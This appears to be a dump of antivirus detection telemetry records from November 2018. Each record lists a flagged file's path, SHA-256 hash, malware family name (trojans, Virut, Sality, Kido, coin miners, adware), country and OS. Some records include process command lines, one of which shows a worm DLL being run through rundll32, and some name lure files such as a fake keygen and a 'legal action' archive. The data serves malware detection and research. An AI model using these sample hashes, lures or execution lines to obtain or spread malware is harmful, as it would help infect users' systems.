  Row(detection=Row(filename='avscan-20181101-155510-3a2defef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155510-3A2DEFEF', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111108-5bef0b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_118ac77b\\AVSCAN-20181101-094023-456A0C31\\AVSCAN-20181101-111108-5BEF0B31', filesize=128000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='0887bb07a45c6da29ed151f86a5f5422461d2380abcac019ee14176df5c3dda7', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091908-f44b2009', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091908-F44B2009', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pengembalian uang.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GAVANS INDONESIA_\\PENGEMBALIAN UANG\\PENGEMBALIAN UANG.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T08:02:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-210722-280293ee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_579e1550\\AVSCAN-20181031-210339-10A15C0C\\AVSCAN-20181031-210722-280293EE', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='4c558f928c0641fa9acfc581c2b9e16354d2d8e09e60b46c4de2bfd9293a0fe1', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:54:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4505995d1d23a2452f64f4c157f1da024a685c6ef9a587d6b2cfe612a6303f9b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-7\\4505995D1D23A2452F64F4C157F1DA024A685C6EF9A587D6B2CFE612A6303F9B', filesize=320000, name='HEUR/Macro.Downloader.AMAK.Gen.#M1.#R1'), hash='4505995d1d23a2452f64f4c157f1da024a685c6ef9a587d6b2cfe612a6303f9b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:58:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dll.exe', filepath='D:\\DATA_SHARE\\program\\unused\\APR_15\\DLL\\DLL.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1501b81bb21821e928edaeaa93c6ba45ff07c5d52eff1526f61bf2493a77d64c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\1501B81BB21821E928EDAEAA93C6BA45FF07C5D52EFF1526F61BF2493A77D64C', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='1501b81bb21821e928edaeaa93c6ba45ff07c5d52eff1526f61bf2493a77d64c', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:56:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185015-f56be8b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_50ed1053\\AVSCAN-20181101-185005-F3E7200F\\AVSCAN-20181101-185015-F56BE8B4', filesize=512000, name='TR/Drop.Agent.coc.#M1.#R1'), hash='2e396b3e8f08784c63f4097171584d19bb30490f16c6363556ae06a7443a26b8', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:50:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142855-235a52e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142855-235A52E8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fscapture.exe', filepath='d:\\gct\\desktop\\english\\fscapture\\fscapture.exe', filesize=9344000, name='TR/Dldr.Sinresby.abfvn.#M1.#R1'), hash='9e13fec7ff37d8db304b41a9aa23a67bb6f407a3f94faf6d22c6e815c4080e98', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T00:10:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-114517-8cdabdae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be41d322\\AVSCAN-20181101-114210-67D851C9\\AVSCAN-20181101-114517-8CDABDAE', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:38:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip.exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP.exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nstC5C0.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d6325ccfdd5e28cbbca738076dc94c950fad34d2f66c79f7fe57fd5a31c96b04.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\D6325CCFDD5E28CBBCA738076DC94C950FAD34D2F66C79F7FE57FD5A31C96B04.VIR', filesize=2752000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100860'), hash='d6325ccfdd5e28cbbca738076dc94c950fad34d2f66c79f7fe57fd5a31c96b04', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:12:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00001fbd', filepath='C:\\Windows\\Temp\\a68d07b9-080a-4503-a42b-270d5c090497\\tmp00000473\\tmp00001fbd', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='ab20d1793daa2e72ab7539e513f224457a27fa17f0ddd9af39de8b9adf4c1dea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.1.856.11526\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-01T00:00:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network.bat', filepath='C:\\Users\\X\\Thunder Network\\Network.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000018e0', filepath='C:\\Windows\\Temp\\7a0c63fd-02c2-460e-80a5-2d52fcb843bf\\tmp00000227\\tmp000018e0', filesize=12800000, name='TR/Patched.Ren.Gen2.#M300.#R100581'), hash='ab20d1793daa2e72ab7539e513f224457a27fa17f0ddd9af39de8b9adf4c1dea', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.1.856.11526\\AdAwareService.exe', parentsize=585784, timestamp='2018-11-01T19:12:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180011-cc674fe0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03535ed8\\AVSCAN-20181101-175937-C62B34C5\\AVSCAN-20181101-180011-CC674FE0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\63F991F524FD3469D5A133BB028A629A67D3F9AE56E1005CDD501D2E56A46040', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='63f991f524fd3469d5a133bb028a629a67d3f9ae56e1005cdd501d2e56a46040', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:16:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='object --> last notification before commencing legal action4471.zip --> 2016inv-apr04203.pdf.js', filepath='object --> Last notification before commencing legal action4471.zip --> 2016INV-APR04203.pdf.js', filesize=16000, name='HTML/ExpKit.Gen2.#M3.#R20197'), hash='83bf4ffce3533fa893349f928adde6b6cc3b3ab0d62323015ab1d9dfc119f3a5', metadata=Row(cmdline=None, country='RU', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T04:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\D:\\Programs\\EWBF\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:24:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='high tv chanelle.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa0.745\\high tv chanelle.exe', filesize=768000, name='TR/Dldr.Zampol.739b8a.#M1.#R1'), hash='739b8a4666a5a3d17bdff8bae937510ff74c1da4c58a98670b8e30e4e7deb8fd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1433592, timestamp='2018-11-01T17:18:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112200-4e1ddb40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112200-4E1DDB40', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a95108756485e864c49f77361dac79d4.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a95108756485e864c49f77361dac79d4.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3643'), hash='6a4c8cbc73292ea252ba6e1045c1cc15476ad137fbbd0ee99de25bc8cb7a3ce8', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:42:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122727-a5cb8efd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122649-85DEF2C5\\AVSCAN-20181101-122727-A5CB8EFD', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:27:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191209-38ed2091', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190219-D4548F48\\AVSCAN-20181101-191209-38ED2091', filesize=64000, name='TR/Siggen.jziio.#M1.#R1'), hash='90568927525dfcaaa660df9052a3ca5011f215b8d8955afe267f85fc3ff979e8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:12:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsg1871.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18630056, timestamp='2018-11-01T13:16:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tzpefjw.vgv', filepath='C:\\Windows\\System32\\tzpefjw.vgv', filesize=164000, name='WORM/Kido.ih.13.#M1.#R1'), hash='90d555ee3df33bc5ee2139af99567c0c694f11ffc007ef87250e4beabb6c6f1b', metadata=Row(cmdline='tzpefjw.vgv,slvfhcm', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T16:59:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='office volume activation script for z.w.t keygen.rar', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Office 2010 (New) Professional Plus 32bit and 64bit with Volume Edition Activator_timesurfer\\Office Volume Activation Script for Z.W.T Keygen.rar', filesize=284000, name='BDS/Bot.140827.#M1.#R1'), hash='d8cc74b15b4bc6301d90d96b73b55f6ff459468ba2cb096e441539950ff20d8b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002942-8618d7c1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b9026954\\AVSCAN-20181102-002813-7A415C46\\AVSCAN-20181102-002942-8618D7C1', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:29:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Users\\X\\AppData\\Local\\$NtUninstallWIC$\\msiexec64.exe', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='BE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe', parentsize=6347056, timestamp='2018-11-01T08:07:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\pes2010plus\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\pes2010plus\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:31:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:09:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:31:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002835-3a611a69', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181102-002835-3A611A69', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\administration\\AFW\\afwv73\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='0c78da3d90f2b7b5976846aaa31136a601a9f378a646284a2db245abce5e346f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe783_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe783 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T14:45:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0128506.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0128506.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:47:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184651-082a4f2b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be284484\\AVSCAN-20181101-184631-05A368C8\\AVSCAN-20181101-184651-082A4F2B', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp0000080d', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp0000080d', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:53:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T22:14:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0006756.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0006756.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:23:07Z'), dt=datetime.date(2018, 11, 1)),
